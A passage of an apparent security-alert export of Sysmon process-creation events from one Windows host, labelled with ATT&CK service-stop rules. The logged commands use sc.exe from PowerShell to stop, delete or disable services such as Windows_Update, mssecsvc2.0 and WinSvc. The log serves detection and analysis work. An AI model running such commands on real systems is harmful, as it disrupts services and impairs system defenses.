C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.853612100Z"",""eventRecordID"":""2689"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.851\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010a7282100}\r\nProcessId: 6324\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop Windows_Update\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:50:28.851"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010a7282100}"",""processId"":""6324"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop Windows_Update"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.072",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.823 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-001018272100} +ProcessId: 5176 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Delete mssecsvc2.0 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Delete mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.825429300Z"",""eventRecordID"":""2687"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.823\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-001018272100}\r\nProcessId: 5176\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Delete mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: 
C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.823"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-001018272100}"",""processId"":""5176"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Delete mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.056",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.802 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00103a262100} +ProcessId: 2128 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.0 +CurrentDirectory: 
C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.804673000Z"",""eventRecordID"":""2686"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.802\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00103a262100}\r\nProcessId: 2128\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.0\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: 
MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.802"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00103a262100}"",""processId"":""2128"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.0"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:59.009",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.758 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010e5232100} +ProcessId: 6548 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 
(WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop mssecsvc2.1 +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.760270500Z"",""eventRecordID"":""2683"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.758\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010e5232100}\r\nProcessId: 6548\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop mssecsvc2.1\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: 
DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.758"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010e5232100}"",""processId"":""6548"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop mssecsvc2.1"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.963",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 
2020-05-28 12:50:28.699 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-00108c212100} +ProcessId: 2360 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop WinSvc +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.702180600Z"",""eventRecordID"":""2680"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.699\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-00108c212100}\r\nProcessId: 2360\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: 
sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop WinSvc\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.699"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-00108c212100}"",""processId"":""2360"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop WinSvc"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo 
-NoProfile""}}}", +"May 29, 2020 @ 14:18:58.947",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.679 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010c4202100} +ProcessId: 8064 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Config WinSvc Start= Disabled +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Config WinSvc Start= Disabled",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.680955900Z"",""eventRecordID"":""2679"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.679\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010c4202100}\r\nProcessId: 8064\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 
(WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Config WinSvc Start= Disabled\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:28.679"",""processGuid"":""{df9fc3d3-b394-5ecf-0000-0010c4202100}"",""processId"":""8064"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config WinSvc Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:18:58.916",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:28.643 +ProcessGuid: {df9fc3d3-b394-5ecf-0000-0010341f2100} +ProcessId: 2096 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SxS +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop 
SxS",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:28.645750400Z"",""eventRecordID"":""2677"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:28.643\r\nProcessGuid: {df9fc3d3-b394-5ecf-0000-0010341f2100}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating 